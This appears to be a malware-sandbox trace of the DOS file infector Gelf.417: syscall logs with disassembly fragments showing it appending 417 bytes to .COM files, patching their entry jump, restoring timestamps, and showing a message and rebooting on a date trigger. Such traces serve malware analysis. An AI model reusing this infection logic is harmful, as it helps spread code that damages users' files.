Sample viewer

vx.netlux.org/Virus.DOS.Gelf.417

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:59:19.160457666Z	42	PC: 12a4f \| Get date 0x12a4f: cmp dx, 0x101 0x12a53: jne 0x12a62 0x12a55: mov ah, 9 0x12a57: mov dx, 0x281 0x12a5a: int 0x21 0x12a5c: mov ah, 1 0x12a5e: int 0x21 0x12a60: int 0x19 0x12a62: call 0x12a7b 0x12a65: jmp 0x12a8e 0x12a67: add byte ptr [bx + si], al 0x12a69: call 0x12a7b 0x12a6c: mov ah, 0x40 0x12a6e: mov cx, 0x1a1 0x12a71: lea dx, word ptr [bp + 0x103] 0x12a75: int 0x21 0x12a77: call 0x12a7b 0x12a7a: ret 0x12a7b: mov bx, word ptr ds:[bp + 0x127] 0x12a80: lea si, word ptr [bp + 0x14e]
2018-12-17T22:59:19.163839451Z	26	PC: 12a9f \| Set disk transfer address
2018-12-17T22:59:19.166292151Z	71	PC: 12aa8 \| Get current directory
2018-12-17T22:59:19.170768153Z	78	PC: 12ab3 \| Find first file
2018-12-17T22:59:19.177778849Z	67	PC: 12ac4 \| Get or set file attributes
2018-12-17T22:59:19.19518362Z	61	PC: 12ad2 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:59:19.202143209Z	63	PC: 12ae0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:19.209114872Z	66	PC: 12af5 \| Move file pointer
2018-12-17T22:59:19.211389307Z	44	PC: 12b03 \| Get time 0x12b03: add dl, dh 0x12b05: cmp bx, 0 0x12b08: je 0x12aff 0x12b0a: mov word ptr ds:[bp + 0x127], bx 0x12b0f: call 0x22a69 0x12b12: mov ax, 0x4200 0x12b15: mov cx, 0 0x12b18: mov dx, 0 0x12b1b: int 0x21 0x12b1d: jb 0x12b2a 0x12b1f: mov ah, 0x40 0x12b21: mov cx, 3 0x12b24: lea dx, word ptr [bp + 0x27e] 0x12b28: int 0x21 0x12b2a: mov ax, 0x4301 0x12b2d: mov cx, word ptr ds:[bp + 0x2b9] 0x12b32: lea dx, word ptr [bp + 0x2c2] 0x12b36: int 0x21 0x12b38: mov ax, 0x5701 0x12b3b: mov cx, word ptr ds:[bp + 0x2ba]
2018-12-17T22:59:19.21414712Z	64	PC: 12a77 \| Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:59:19.223043439Z	66	PC: 12b1d \| Move file pointer
2018-12-17T22:59:19.226277277Z	64	PC: 12b2a \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:59:19.233391127Z	67	PC: 12b38 \| Get or set file attributes
2018-12-17T22:59:19.23862364Z	87	PC: 12b47 \| Get or set file date and time
2018-12-17T22:59:19.241498163Z	62	PC: 12b4b \| Close file
2018-12-17T22:59:19.250725254Z	79	PC: 12ab3 \| Find next file
2018-12-17T22:59:19.254193072Z	67	PC: 12ac4 \| Get or set file attributes
2018-12-17T22:59:19.265692885Z	61	PC: 12ad2 \| Open file (Filename = 'PRINT.COM')
2018-12-17T22:59:19.273858671Z	63	PC: 12ae0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:19.28071677Z	66	PC: 12af5 \| Move file pointer
2018-12-17T22:59:19.282282413Z	44	PC: 12b03 \| Get time 0x12b03: add dl, dh 0x12b05: cmp bx, 0 0x12b08: je 0x12aff 0x12b0a: mov word ptr ds:[bp + 0x127], bx 0x12b0f: call 0x22a69 0x12b12: mov ax, 0x4200 0x12b15: mov cx, 0 0x12b18: mov dx, 0 0x12b1b: int 0x21 0x12b1d: jb 0x12b2a 0x12b1f: mov ah, 0x40 0x12b21: mov cx, 3 0x12b24: lea dx, word ptr [bp + 0x27e] 0x12b28: int 0x21 0x12b2a: mov ax, 0x4301 0x12b2d: mov cx, word ptr ds:[bp + 0x2b9] 0x12b32: lea dx, word ptr [bp + 0x2c2] 0x12b36: int 0x21 0x12b38: mov ax, 0x5701 0x12b3b: mov cx, word ptr ds:[bp + 0x2ba]
2018-12-17T22:59:19.28599465Z	64	PC: 12a77 \| Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:59:19.289200274Z	66	PC: 12b1d \| Move file pointer
2018-12-17T22:59:19.291014684Z	64	PC: 12b2a \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:59:19.294726931Z	67	PC: 12b38 \| Get or set file attributes
2018-12-17T22:59:19.300343828Z	87	PC: 12b47 \| Get or set file date and time
2018-12-17T22:59:19.302608323Z	62	PC: 12b4b \| Close file
2018-12-17T22:59:19.311486108Z	79	PC: 12ab3 \| Find next file
2018-12-17T22:59:19.31539793Z	67	PC: 12ac4 \| Get or set file attributes
2018-12-17T22:59:19.325902322Z	61	PC: 12ad2 \| Open file (Filename = 'HELLO.COM')
2018-12-17T22:59:19.33396249Z	63	PC: 12ae0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:19.341429784Z	66	PC: 12af5 \| Move file pointer
2018-12-17T22:59:19.343071921Z	44	PC: 12b03 \| Get time 0x12b03: add dl, dh 0x12b05: cmp bx, 0 0x12b08: je 0x12aff 0x12b0a: mov word ptr ds:[bp + 0x127], bx 0x12b0f: call 0x22a69 0x12b12: mov ax, 0x4200 0x12b15: mov cx, 0 0x12b18: mov dx, 0 0x12b1b: int 0x21 0x12b1d: jb 0x12b2a 0x12b1f: mov ah, 0x40 0x12b21: mov cx, 3 0x12b24: lea dx, word ptr [bp + 0x27e] 0x12b28: int 0x21 0x12b2a: mov ax, 0x4301 0x12b2d: mov cx, word ptr ds:[bp + 0x2b9] 0x12b32: lea dx, word ptr [bp + 0x2c2] 0x12b36: int 0x21 0x12b38: mov ax, 0x5701 0x12b3b: mov cx, word ptr ds:[bp + 0x2ba]
2018-12-17T22:59:19.346155777Z	64	PC: 12a77 \| Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:59:19.349349108Z	66	PC: 12b1d \| Move file pointer
2018-12-17T22:59:19.351044695Z	64	PC: 12b2a \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:59:19.354260428Z	67	PC: 12b38 \| Get or set file attributes
2018-12-17T22:59:19.36032161Z	87	PC: 12b47 \| Get or set file date and time
2018-12-17T22:59:19.362057131Z	62	PC: 12b4b \| Close file
2018-12-17T22:59:19.370162715Z	79	PC: 12ab3 \| Find next file
2018-12-17T22:59:19.373614492Z	67	PC: 12ac4 \| Get or set file attributes
2018-12-17T22:59:19.385240122Z	61	PC: 12ad2 \| Open file (Filename = 'PHANG.COM')
2018-12-17T22:59:19.392572211Z	63	PC: 12ae0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:19.400749059Z	66	PC: 12af5 \| Move file pointer
2018-12-17T22:59:19.402321143Z	44	PC: 12b03 \| Get time 0x12b03: add dl, dh 0x12b05: cmp bx, 0 0x12b08: je 0x12aff 0x12b0a: mov word ptr ds:[bp + 0x127], bx 0x12b0f: call 0x22a69 0x12b12: mov ax, 0x4200 0x12b15: mov cx, 0 0x12b18: mov dx, 0 0x12b1b: int 0x21 0x12b1d: jb 0x12b2a 0x12b1f: mov ah, 0x40 0x12b21: mov cx, 3 0x12b24: lea dx, word ptr [bp + 0x27e] 0x12b28: int 0x21 0x12b2a: mov ax, 0x4301 0x12b2d: mov cx, word ptr ds:[bp + 0x2b9] 0x12b32: lea dx, word ptr [bp + 0x2c2] 0x12b36: int 0x21 0x12b38: mov ax, 0x5701 0x12b3b: mov cx, word ptr ds:[bp + 0x2ba]
2018-12-17T22:59:19.404707579Z	64	PC: 12a77 \| Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:59:19.40853387Z	66	PC: 12b1d \| Move file pointer
2018-12-17T22:59:19.410072993Z	64	PC: 12b2a \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:59:19.413224705Z	67	PC: 12b38 \| Get or set file attributes
2018-12-17T22:59:19.419404009Z	87	PC: 12b47 \| Get or set file date and time
2018-12-17T22:59:19.425006749Z	62	PC: 12b4b \| Close file
2018-12-17T22:59:19.433162597Z	79	PC: 12ab3 \| Find next file
2018-12-17T22:59:19.437580009Z	67	PC: 12ac4 \| Get or set file attributes
2018-12-17T22:59:19.448336625Z	61	PC: 12ad2 \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:59:19.461079464Z	63	PC: 12ae0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:19.468222018Z	66	PC: 12af5 \| Move file pointer
2018-12-17T22:59:19.470700215Z	44	PC: 12b03 \| Get time 0x12b03: add dl, dh 0x12b05: cmp bx, 0 0x12b08: je 0x12aff 0x12b0a: mov word ptr ds:[bp + 0x127], bx 0x12b0f: call 0x22a69 0x12b12: mov ax, 0x4200 0x12b15: mov cx, 0 0x12b18: mov dx, 0 0x12b1b: int 0x21 0x12b1d: jb 0x12b2a 0x12b1f: mov ah, 0x40 0x12b21: mov cx, 3 0x12b24: lea dx, word ptr [bp + 0x27e] 0x12b28: int 0x21 0x12b2a: mov ax, 0x4301 0x12b2d: mov cx, word ptr ds:[bp + 0x2b9] 0x12b32: lea dx, word ptr [bp + 0x2c2] 0x12b36: int 0x21 0x12b38: mov ax, 0x5701 0x12b3b: mov cx, word ptr ds:[bp + 0x2ba]
2018-12-17T22:59:19.47322487Z	64	PC: 12a77 \| Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:59:19.476325578Z	66	PC: 12b1d \| Move file pointer
2018-12-17T22:59:19.480034638Z	64	PC: 12b2a \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:59:19.483035508Z	67	PC: 12b38 \| Get or set file attributes
2018-12-17T22:59:19.488233998Z	87	PC: 12b47 \| Get or set file date and time
2018-12-17T22:59:19.491212576Z	62	PC: 12b4b \| Close file
2018-12-17T22:59:19.49917478Z	79	PC: 12ab3 \| Find next file
2018-12-17T22:59:19.502160943Z	67	PC: 12ac4 \| Get or set file attributes
2018-12-17T22:59:19.513771724Z	61	PC: 12ad2 \| Open file (Filename = 'MANDEL.COM')
2018-12-17T22:59:19.520978829Z	63	PC: 12ae0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:19.528570086Z	66	PC: 12af5 \| Move file pointer
2018-12-17T22:59:19.531838999Z	44	PC: 12b03 \| Get time 0x12b03: add dl, dh 0x12b05: cmp bx, 0 0x12b08: je 0x12aff 0x12b0a: mov word ptr ds:[bp + 0x127], bx 0x12b0f: call 0x22a69 0x12b12: mov ax, 0x4200 0x12b15: mov cx, 0 0x12b18: mov dx, 0 0x12b1b: int 0x21 0x12b1d: jb 0x12b2a 0x12b1f: mov ah, 0x40 0x12b21: mov cx, 3 0x12b24: lea dx, word ptr [bp + 0x27e] 0x12b28: int 0x21 0x12b2a: mov ax, 0x4301 0x12b2d: mov cx, word ptr ds:[bp + 0x2b9] 0x12b32: lea dx, word ptr [bp + 0x2c2] 0x12b36: int 0x21 0x12b38: mov ax, 0x5701 0x12b3b: mov cx, word ptr ds:[bp + 0x2ba]
2018-12-17T22:59:19.535293101Z	64	PC: 12a77 \| Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:59:19.544690723Z	66	PC: 12b1d \| Move file pointer
2018-12-17T22:59:19.546511786Z	64	PC: 12b2a \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:59:19.555017822Z	67	PC: 12b38 \| Get or set file attributes
2018-12-17T22:59:19.56045474Z	87	PC: 12b47 \| Get or set file date and time
2018-12-17T22:59:19.562345533Z	62	PC: 12b4b \| Close file
2018-12-17T22:59:19.57198543Z	79	PC: 12ab3 \| Find next file
2018-12-17T22:59:19.575024953Z	67	PC: 12ac4 \| Get or set file attributes
2018-12-17T22:59:19.585530107Z	61	PC: 12ad2 \| Open file (Filename = 'PAH.COM')
2018-12-17T22:59:19.593755525Z	63	PC: 12ae0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:19.601631146Z	66	PC: 12af5 \| Move file pointer
2018-12-17T22:59:19.603470734Z	44	PC: 12b03 \| Get time 0x12b03: add dl, dh 0x12b05: cmp bx, 0 0x12b08: je 0x12aff 0x12b0a: mov word ptr ds:[bp + 0x127], bx 0x12b0f: call 0x22a69 0x12b12: mov ax, 0x4200 0x12b15: mov cx, 0 0x12b18: mov dx, 0 0x12b1b: int 0x21 0x12b1d: jb 0x12b2a 0x12b1f: mov ah, 0x40 0x12b21: mov cx, 3 0x12b24: lea dx, word ptr [bp + 0x27e] 0x12b28: int 0x21 0x12b2a: mov ax, 0x4301 0x12b2d: mov cx, word ptr ds:[bp + 0x2b9] 0x12b32: lea dx, word ptr [bp + 0x2c2] 0x12b36: int 0x21 0x12b38: mov ax, 0x5701 0x12b3b: mov cx, word ptr ds:[bp + 0x2ba]
2018-12-17T22:59:19.606955613Z	64	PC: 12a77 \| Write file or device (Write 417 bytes on handle 5)
2018-12-17T22:59:19.610435453Z	66	PC: 12b1d \| Move file pointer
2018-12-17T22:59:19.612250535Z	64	PC: 12b2a \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:59:19.615608546Z	67	PC: 12b38 \| Get or set file attributes
2018-12-17T22:59:19.621847581Z	87	PC: 12b47 \| Get or set file date and time
2018-12-17T22:59:19.623705173Z	62	PC: 12b4b \| Close file
2018-12-17T22:59:19.631964946Z	79	PC: 12ab3 \| Find next file
2018-12-17T22:59:19.635966416Z	67	PC: 12ac4 \| Get or set file attributes
2018-12-17T22:59:19.647178368Z	61	PC: 12ad2 \| Open file (Filename = 'TEST.COM')
2018-12-17T22:59:19.654571984Z	63	PC: 12ae0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:59:19.662923529Z	67	PC: 12b38 \| Get or set file attributes
2018-12-17T22:59:19.669020238Z	87	PC: 12b47 \| Get or set file date and time
2018-12-17T22:59:19.671078837Z	62	PC: 12b4b \| Close file
2018-12-17T22:59:19.679922858Z	79	PC: 12ab3 \| Find next file
2018-12-17T22:59:19.683213322Z	59	PC: 12b63 \| Change current directory
2018-12-17T22:59:19.687993686Z	59	PC: 12b6f \| Change current directory
2018-12-17T22:59:19.692842198Z	26	PC: 12b57 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13166,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:37:37.626941388Z	42	PC: 12a4f \| Get date 0x12a4f: cmp dx, 0x101 0x12a53: jne 0x12a62 0x12a55: mov ah, 9 0x12a57: mov dx, 0x281 0x12a5a: int 0x21 0x12a5c: mov ah, 1 0x12a5e: int 0x21 0x12a60: int 0x19 0x12a62: call 0x12a7b 0x12a65: jmp 0x12a8e 0x12a67: add byte ptr [bx + si], al 0x12a69: call 0x12a7b 0x12a6c: mov ah, 0x40 0x12a6e: mov cx, 0x1a1 0x12a71: lea dx, word ptr [bp + 0x103] 0x12a75: int 0x21 0x12a77: call 0x12a7b 0x12a7a: ret 0x12a7b: mov bx, word ptr ds:[bp + 0x127] 0x12a80: lea si, word ptr [bp + 0x14e]
2018-12-25T12:37:37.630127326Z	9	PC: 12a5c \| Display string (String= '[Gelf] Virus written by EXE-Gency!')
2018-12-25T12:37:37.632485662Z	1	PC: 12a60 \| Character input

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13166,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:37:37.638263185Z	42	PC: 12a4f \| Get date 0x12a4f: cmp dx, 0x101 0x12a53: jne 0x12a62 0x12a55: mov ah, 9 0x12a57: mov dx, 0x281 0x12a5a: int 0x21 0x12a5c: mov ah, 1 0x12a5e: int 0x21 0x12a60: int 0x19 0x12a62: call 0x12a7b 0x12a65: jmp 0x12a8e 0x12a67: add byte ptr [bx + si], al 0x12a69: call 0x12a7b 0x12a6c: mov ah, 0x40 0x12a6e: mov cx, 0x1a1 0x12a71: lea dx, word ptr [bp + 0x103] 0x12a75: int 0x21 0x12a77: call 0x12a7b 0x12a7a: ret 0x12a7b: mov bx, word ptr ds:[bp + 0x127] 0x12a80: lea si, word ptr [bp + 0x14e]
2018-12-25T12:37:37.64122041Z	26	PC: 12a9f \| Set disk transfer address
2018-12-25T12:37:37.657377514Z	71	PC: 12aa8 \| Get current directory
2018-12-25T12:37:37.660592385Z	78	PC: 12ab3 \| Find first file
2018-12-25T12:37:37.668199388Z	67	PC: 12ac4 \| Get or set file attributes
2018-12-25T12:37:37.695211934Z	61	PC: 12ad2 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:37:37.710572984Z	63	PC: 12ae0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:37:37.718131329Z	66	PC: 12af5 \| Move file pointer
2018-12-25T12:37:37.721086829Z	44	PC: 12b03 \| Get time 0x12b03: add dl, dh 0x12b05: cmp bx, 0 0x12b08: je 0x12aff 0x12b0a: mov word ptr ds:[bp + 0x127], bx 0x12b0f: call 0x22a69 0x12b12: mov ax, 0x4200 0x12b15: mov cx, 0 0x12b18: mov dx, 0 0x12b1b: int 0x21 0x12b1d: jb 0x12b2a 0x12b1f: mov ah, 0x40 0x12b21: mov cx, 3 0x12b24: lea dx, word ptr [bp + 0x27e] 0x12b28: int 0x21 0x12b2a: mov ax, 0x4301 0x12b2d: mov cx, word ptr ds:[bp + 0x2b9] 0x12b32: lea dx, word ptr [bp + 0x2c2] 0x12b36: int 0x21 0x12b38: mov ax, 0x5701 0x12b3b: mov cx, word ptr ds:[bp + 0x2ba]
2018-12-25T12:37:37.723558006Z	64	PC: 12a77 \| Write file or device (Write 417 bytes on handle 5)
2018-12-25T12:37:37.904361652Z	66	PC: 12b1d \| Move file pointer
2018-12-25T12:37:37.906809972Z	64	PC: 12b2a \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:37:37.91280584Z	67	PC: 12b38 \| Get or set file attributes
2018-12-25T12:37:37.916639347Z	87	PC: 12b47 \| Get or set file date and time
2018-12-25T12:37:37.917960457Z	62	PC: 12b4b \| Close file
2018-12-25T12:37:38.048610258Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:38.051571043Z	67	PC: 12ac4 \| Get or set file attributes (See above)
2018-12-25T12:37:38.263143319Z	61	PC: 12ad2 \| Open file (See above)
2018-12-25T12:37:38.271705328Z	63	PC: 12ae0 \| Read file or device (See above)
2018-12-25T12:37:38.279052524Z	66	PC: 12af5 \| Move file pointer (See above)
2018-12-25T12:37:38.280714581Z	44	PC: 12b03 \| Get time (See above)
2018-12-25T12:37:38.28409708Z	64	PC: 12a77 \| Write file or device (See above)
2018-12-25T12:37:38.286232623Z	66	PC: 12b1d \| Move file pointer (See above)
2018-12-25T12:37:38.287878373Z	64	PC: 12b2a \| Write file or device (See above)
2018-12-25T12:37:38.291910033Z	67	PC: 12b38 \| Get or set file attributes (See above)
2018-12-25T12:37:38.297873197Z	87	PC: 12b47 \| Get or set file date and time (See above)
2018-12-25T12:37:38.299407672Z	62	PC: 12b4b \| Close file (See above)
2018-12-25T12:37:38.427656323Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:38.430788509Z	67	PC: 12ac4 \| Get or set file attributes (See above)
2018-12-25T12:37:38.556735783Z	61	PC: 12ad2 \| Open file (See above)
2018-12-25T12:37:38.563563328Z	63	PC: 12ae0 \| Read file or device (See above)
2018-12-25T12:37:38.572617553Z	66	PC: 12af5 \| Move file pointer (See above)
2018-12-25T12:37:38.574166806Z	44	PC: 12b03 \| Get time (See above)
2018-12-25T12:37:38.576556335Z	64	PC: 12a77 \| Write file or device (See above)
2018-12-25T12:37:38.596521037Z	66	PC: 12b1d \| Move file pointer (See above)
2018-12-25T12:37:38.598498321Z	64	PC: 12b2a \| Write file or device (See above)
2018-12-25T12:37:38.601563707Z	67	PC: 12b38 \| Get or set file attributes (See above)
2018-12-25T12:37:38.607687399Z	87	PC: 12b47 \| Get or set file date and time (See above)
2018-12-25T12:37:38.609916401Z	62	PC: 12b4b \| Close file (See above)
2018-12-25T12:37:38.708410544Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:38.714113561Z	67	PC: 12ac4 \| Get or set file attributes (See above)
2018-12-25T12:37:38.728333576Z	61	PC: 12ad2 \| Open file (See above)
2018-12-25T12:37:38.735683239Z	63	PC: 12ae0 \| Read file or device (See above)
2018-12-25T12:37:38.745917395Z	66	PC: 12af5 \| Move file pointer (See above)
2018-12-25T12:37:38.748274381Z	44	PC: 12b03 \| Get time (See above)
2018-12-25T12:37:38.751506071Z	64	PC: 12a77 \| Write file or device (See above)
2018-12-25T12:37:38.756685667Z	66	PC: 12b1d \| Move file pointer (See above)
2018-12-25T12:37:38.758817354Z	64	PC: 12b2a \| Write file or device (See above)
2018-12-25T12:37:38.764029121Z	67	PC: 12b38 \| Get or set file attributes (See above)
2018-12-25T12:37:38.770634582Z	87	PC: 12b47 \| Get or set file date and time (See above)
2018-12-25T12:37:38.772493533Z	62	PC: 12b4b \| Close file (See above)
2018-12-25T12:37:38.781739569Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:38.785073338Z	67	PC: 12ac4 \| Get or set file attributes (See above)
2018-12-25T12:37:38.797756428Z	61	PC: 12ad2 \| Open file (See above)
2018-12-25T12:37:38.805789785Z	63	PC: 12ae0 \| Read file or device (See above)
2018-12-25T12:37:38.814236631Z	66	PC: 12af5 \| Move file pointer (See above)
2018-12-25T12:37:38.817461431Z	44	PC: 12b03 \| Get time (See above)
2018-12-25T12:37:38.82080231Z	64	PC: 12a77 \| Write file or device (See above)
2018-12-25T12:37:38.825612382Z	66	PC: 12b1d \| Move file pointer (See above)
2018-12-25T12:37:38.828497042Z	64	PC: 12b2a \| Write file or device (See above)
2018-12-25T12:37:38.832173378Z	67	PC: 12b38 \| Get or set file attributes (See above)
2018-12-25T12:37:38.837737889Z	87	PC: 12b47 \| Get or set file date and time (See above)
2018-12-25T12:37:38.840581227Z	62	PC: 12b4b \| Close file (See above)
2018-12-25T12:37:38.849683738Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:38.853035042Z	67	PC: 12ac4 \| Get or set file attributes (See above)
2018-12-25T12:37:38.86419217Z	61	PC: 12ad2 \| Open file (See above)
2018-12-25T12:37:38.873082781Z	63	PC: 12ae0 \| Read file or device (See above)
2018-12-25T12:37:38.880514949Z	66	PC: 12af5 \| Move file pointer (See above)
2018-12-25T12:37:38.882528397Z	44	PC: 12b03 \| Get time (See above)
2018-12-25T12:37:38.886576737Z	64	PC: 12a77 \| Write file or device (See above)
2018-12-25T12:37:38.895988338Z	66	PC: 12b1d \| Move file pointer (See above)
2018-12-25T12:37:38.897965403Z	64	PC: 12b2a \| Write file or device (See above)
2018-12-25T12:37:38.906516162Z	67	PC: 12b38 \| Get or set file attributes (See above)
2018-12-25T12:37:38.913229784Z	87	PC: 12b47 \| Get or set file date and time (See above)
2018-12-25T12:37:38.915355059Z	62	PC: 12b4b \| Close file (See above)
2018-12-25T12:37:38.925322482Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:38.928975007Z	67	PC: 12ac4 \| Get or set file attributes (See above)
2018-12-25T12:37:38.940138875Z	61	PC: 12ad2 \| Open file (See above)
2018-12-25T12:37:38.947898676Z	63	PC: 12ae0 \| Read file or device (See above)
2018-12-25T12:37:38.956542855Z	66	PC: 12af5 \| Move file pointer (See above)
2018-12-25T12:37:38.958569837Z	44	PC: 12b03 \| Get time (See above)
2018-12-25T12:37:38.961488545Z	64	PC: 12a77 \| Write file or device (See above)
2018-12-25T12:37:38.974598351Z	66	PC: 12b1d \| Move file pointer (See above)
2018-12-25T12:37:38.976261573Z	64	PC: 12b2a \| Write file or device (See above)
2018-12-25T12:37:38.979283286Z	67	PC: 12b38 \| Get or set file attributes (See above)
2018-12-25T12:37:38.9856613Z	87	PC: 12b47 \| Get or set file date and time (See above)
2018-12-25T12:37:38.988097453Z	62	PC: 12b4b \| Close file (See above)
2018-12-25T12:37:38.996489592Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:39.000576902Z	67	PC: 12ac4 \| Get or set file attributes (See above)
2018-12-25T12:37:39.011884913Z	61	PC: 12ad2 \| Open file (See above)
2018-12-25T12:37:39.019525896Z	63	PC: 12ae0 \| Read file or device (See above)
2018-12-25T12:37:39.022774953Z	67	PC: 12b38 \| Get or set file attributes (See above)
2018-12-25T12:37:39.029429389Z	87	PC: 12b47 \| Get or set file date and time (See above)
2018-12-25T12:37:39.031473606Z	62	PC: 12b4b \| Close file (See above)
2018-12-25T12:37:39.039469128Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:39.044339286Z	59	PC: 12b63 \| Change current directory
2018-12-25T12:37:39.049256812Z	59	PC: 12b6f \| Change current directory
2018-12-25T12:37:39.054008347Z	26	PC: 12b57 \| Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13166,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:37:37.724358328Z	42	PC: 12a4f \| Get date 0x12a4f: cmp dx, 0x101 0x12a53: jne 0x12a62 0x12a55: mov ah, 9 0x12a57: mov dx, 0x281 0x12a5a: int 0x21 0x12a5c: mov ah, 1 0x12a5e: int 0x21 0x12a60: int 0x19 0x12a62: call 0x12a7b 0x12a65: jmp 0x12a8e 0x12a67: add byte ptr [bx + si], al 0x12a69: call 0x12a7b 0x12a6c: mov ah, 0x40 0x12a6e: mov cx, 0x1a1 0x12a71: lea dx, word ptr [bp + 0x103] 0x12a75: int 0x21 0x12a77: call 0x12a7b 0x12a7a: ret 0x12a7b: mov bx, word ptr ds:[bp + 0x127] 0x12a80: lea si, word ptr [bp + 0x14e]
2018-12-25T12:37:37.72652761Z	9	PC: 12a5c \| Display string (String= '[Gelf] Virus written by EXE-Gency!')
2018-12-25T12:37:37.728283902Z	1	PC: 12a60 \| Character input

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13166,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:37:37.729739451Z	42	PC: 12a4f \| Get date 0x12a4f: cmp dx, 0x101 0x12a53: jne 0x12a62 0x12a55: mov ah, 9 0x12a57: mov dx, 0x281 0x12a5a: int 0x21 0x12a5c: mov ah, 1 0x12a5e: int 0x21 0x12a60: int 0x19 0x12a62: call 0x12a7b 0x12a65: jmp 0x12a8e 0x12a67: add byte ptr [bx + si], al 0x12a69: call 0x12a7b 0x12a6c: mov ah, 0x40 0x12a6e: mov cx, 0x1a1 0x12a71: lea dx, word ptr [bp + 0x103] 0x12a75: int 0x21 0x12a77: call 0x12a7b 0x12a7a: ret 0x12a7b: mov bx, word ptr ds:[bp + 0x127] 0x12a80: lea si, word ptr [bp + 0x14e]
2018-12-25T12:37:37.732590251Z	26	PC: 12a9f \| Set disk transfer address
2018-12-25T12:37:37.733892849Z	71	PC: 12aa8 \| Get current directory
2018-12-25T12:37:37.736887435Z	78	PC: 12ab3 \| Find first file
2018-12-25T12:37:37.743324559Z	67	PC: 12ac4 \| Get or set file attributes
2018-12-25T12:37:38.708334102Z	61	PC: 12ad2 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:37:38.716275014Z	63	PC: 12ae0 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:37:38.723435219Z	66	PC: 12af5 \| Move file pointer
2018-12-25T12:37:38.726091184Z	44	PC: 12b03 \| Get time 0x12b03: add dl, dh 0x12b05: cmp bx, 0 0x12b08: je 0x12aff 0x12b0a: mov word ptr ds:[bp + 0x127], bx 0x12b0f: call 0x22a69 0x12b12: mov ax, 0x4200 0x12b15: mov cx, 0 0x12b18: mov dx, 0 0x12b1b: int 0x21 0x12b1d: jb 0x12b2a 0x12b1f: mov ah, 0x40 0x12b21: mov cx, 3 0x12b24: lea dx, word ptr [bp + 0x27e] 0x12b28: int 0x21 0x12b2a: mov ax, 0x4301 0x12b2d: mov cx, word ptr ds:[bp + 0x2b9] 0x12b32: lea dx, word ptr [bp + 0x2c2] 0x12b36: int 0x21 0x12b38: mov ax, 0x5701 0x12b3b: mov cx, word ptr ds:[bp + 0x2ba]
2018-12-25T12:37:38.730766569Z	64	PC: 12a77 \| Write file or device (Write 417 bytes on handle 5)
2018-12-25T12:37:38.744115866Z	66	PC: 12b1d \| Move file pointer
2018-12-25T12:37:38.749412002Z	64	PC: 12b2a \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:37:38.755290355Z	67	PC: 12b38 \| Get or set file attributes
2018-12-25T12:37:38.759386608Z	87	PC: 12b47 \| Get or set file date and time
2018-12-25T12:37:38.761142242Z	62	PC: 12b4b \| Close file
2018-12-25T12:37:38.768626294Z	79	PC: 12ab3 \| Find next file (See above)
2018-12-25T12:37:38.772119105Z	67	PC: 12ac4 \| Get or set file attributes (See above)
2018-12-25T12:37:38.78397743Z	61	PC: 12ad2 \| Open file (See above)
2018-12-25T12:37:38.793102663Z	63	PC: 12ae0 \| Read file or device (See above)
2018-12-25T12:37:38.800688958Z	66	PC: 12af5 \| Move file pointer (See above)
2018-12-25T12:37:38.803727651Z	44	PC: 12b03 \| Get time (See above)
2018-12-25T12:37:38.807163526Z	64	PC: 12a77 \| Write file or device (See above)
2018-12-25T12:37:38.810592553Z	66	PC: 12b1d \| Move file pointer (See above)
2018-12-25T12:37:38.812551146Z	64	PC: 12b2a \| Write file or device (See above)
2018-12-25T12:37:38.81684827Z	67	PC: 12b38 \| Get or set file attributes (See above)
